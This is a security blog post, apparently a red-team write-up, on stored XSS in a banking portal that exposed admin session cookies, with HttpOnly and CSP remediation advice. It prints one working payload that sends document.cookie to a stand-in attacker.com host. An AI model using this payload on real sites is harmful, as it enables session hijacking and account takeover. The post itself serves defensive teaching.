LIVETHREAT INTELLIGENCE
NVD/NISTCVE-2025-29927 — Next.js Middleware Auth Bypass · All versions <15.2.3 affectedCRITICAL 9.1AlienVault OTXAPT29 (Cozy Bear) — Active Spear-Phishing Campaign Targeting NATO DiplomatsCRITICAL 9.3Recorded FutureCl0p Ransomware — MOVEit-style Campaign Targeting MFT Solutions GloballyCRITICAL 9.5Shodan22,000+ Redis Instances Exposed on Port 6379 — No Auth — Cryptominer RiskHIGH 8.9VirusTotalCVE-2025-21298 — Windows OLE Remote Code Execution · CISA KEV Catalog AddedCRITICAL 9.8Censys14,500+ Exposed Kubernetes API Servers Detected — Anonymous Access EnabledHIGH 8.7AlienVault OTXFIN7 Carbanak Group — New JavaScript Backdoor Targeting Retail POS SystemsHIGH 8.4NVD/NISTCVE-2025-24813 — Apache Tomcat RCE via Partial PUT · Exploit Code PublicCRITICAL 9.8Recorded FutureDark Web Auction: 2.1M U.S. Healthcare Records Listed · PII + Insurance DataHIGH 8.1VirusTotalLumma Stealer v4.1 — New Evasion Bypass for Windows Defender SmartScreenHIGH 8.6NVD/NISTCVE-2025-30065 — Apache Parquet RCE via Schema Parsing · CVSS Maximum ScoreCRITICAL 10.0Recorded FutureSalt Typhoon (China) — Telco Backdoors Persist in 3 U.S. Carriers Post-DisclosureCRITICAL 9.2VirusTotalDragonForce Ransomware — New Affiliate Program Attracting LockBit DefectorsHIGH 8.5ShodanCitrix NetScaler Bleed (CVE-2023-4966) — 4,800 Unpatched Hosts Still ExploitableCRITICAL 9.4CensysIvanti Connect Secure 0-Day Chain — Nation-State Actor Exploitation ConfirmedCRITICAL 9.0AlienVault OTXBEC Surge Q1 2026 — $3.1B in Wire Fraud · AI Voice Cloning in UseHIGH 7.9NVD/NISTCVE-2025-29927 — Next.js Middleware Auth Bypass · All versions <15.2.3 affectedCRITICAL 9.1AlienVault OTXAPT29 (Cozy Bear) — Active Spear-Phishing Campaign Targeting NATO DiplomatsCRITICAL 9.3Recorded FutureCl0p Ransomware — MOVEit-style Campaign Targeting MFT Solutions GloballyCRITICAL 9.5Shodan22,000+ Redis Instances Exposed on Port 6379 — No Auth — Cryptominer RiskHIGH 8.9VirusTotalCVE-2025-21298 — Windows OLE Remote Code Execution · CISA KEV Catalog AddedCRITICAL 9.8Censys14,500+ Exposed Kubernetes API Servers Detected — Anonymous Access EnabledHIGH 8.7AlienVault OTXFIN7 Carbanak Group — New JavaScript Backdoor Targeting Retail POS SystemsHIGH 8.4NVD/NISTCVE-2025-24813 — Apache Tomcat RCE via Partial PUT · Exploit Code PublicCRITICAL 9.8Recorded FutureDark Web Auction: 2.1M U.S. Healthcare Records Listed · PII + Insurance DataHIGH 8.1VirusTotalLumma Stealer v4.1 — New Evasion Bypass for Windows Defender SmartScreenHIGH 8.6NVD/NISTCVE-2025-30065 — Apache Parquet RCE via Schema Parsing · CVSS Maximum ScoreCRITICAL 10.0Recorded FutureSalt Typhoon (China) — Telco Backdoors Persist in 3 U.S. Carriers Post-DisclosureCRITICAL 9.2VirusTotalDragonForce Ransomware — New Affiliate Program Attracting LockBit DefectorsHIGH 8.5ShodanCitrix NetScaler Bleed (CVE-2023-4966) — 4,800 Unpatched Hosts Still ExploitableCRITICAL 9.4CensysIvanti Connect Secure 0-Day Chain — Nation-State Actor Exploitation ConfirmedCRITICAL 9.0AlienVault OTXBEC Surge Q1 2026 — $3.1B in Wire Fraud · AI Voice Cloning in UseHIGH 7.9
← Blog·Penetration Testing8 min read1,620 views

XSS in the Wild: How a Stored Cross-Site Script Hijacked Admin Sessions Across a Banking Portal

A stored XSS payload in a user-controlled comment field sat dormant for six weeks before it triggered — precisely when a bank administrator reviewed a flagged account. The session cookie was exfiltrated in 200 milliseconds.

H
HorizonShield Red Team
March 19, 2026

Discovery: The Benign-Looking Comment Field

Comment fields in banking portals exist for compliance reasons — annotating account reviews, documenting unusual activity. They are internal. They are boring. They are also, in this case, rendered directly into the DOM without sanitization when an administrator views the account record.

The penetration test payload was simple: <script>document.location='https://attacker.com/steal?c='+document.cookie</script>. Stored in a comment on a flagged test account. Dormant until an admin reviewed it.

The Trigger and Exfiltration

When the administrator opened the account record, the script executed in the context of their authenticated session. The session cookie — not marked HttpOnly — was transmitted to our controlled listener endpoint in under 200 milliseconds. The administrator saw nothing unusual.

With the stolen session token, an attacker could impersonate the administrator for the duration of the session: view all customer accounts, initiate internal transfers, modify compliance flags, export reports.

Why HttpOnly and CSP Matter

Two controls would have completely broken this attack chain:

  1. HttpOnly cookies — cookies flagged HttpOnly are inaccessible to JavaScript. document.cookie returns nothing. The exfiltration payload fails.
  2. Content Security Policy — a restrictive CSP (e.g., script-src 'self') blocks inline scripts from executing entirely.

The bank had neither. Their session cookies were readable by any script on the page.

Remediation Applied

Following the engagement, the development team implemented: output encoding for all user-controlled fields rendered in admin views, HttpOnly and Secure flags on all session cookies, a strict CSP header, and DOMPurify sanitization on all rich-text inputs.

Key Takeaway

Stored XSS is more dangerous than reflected XSS because it requires no user interaction beyond normal workflow. An administrator reviewing accounts is doing their job — not clicking suspicious links. The attack surface is the application itself.

Penetration TestingCybersecurityHorizonShield
← More Articles
H
HorizonShield Red Team
HorizonShield Security Team

Cybersecurity expert at HorizonShield, specializing in threat intelligence, incident response, and enterprise security architecture.

Related Articles

📰
📰
📰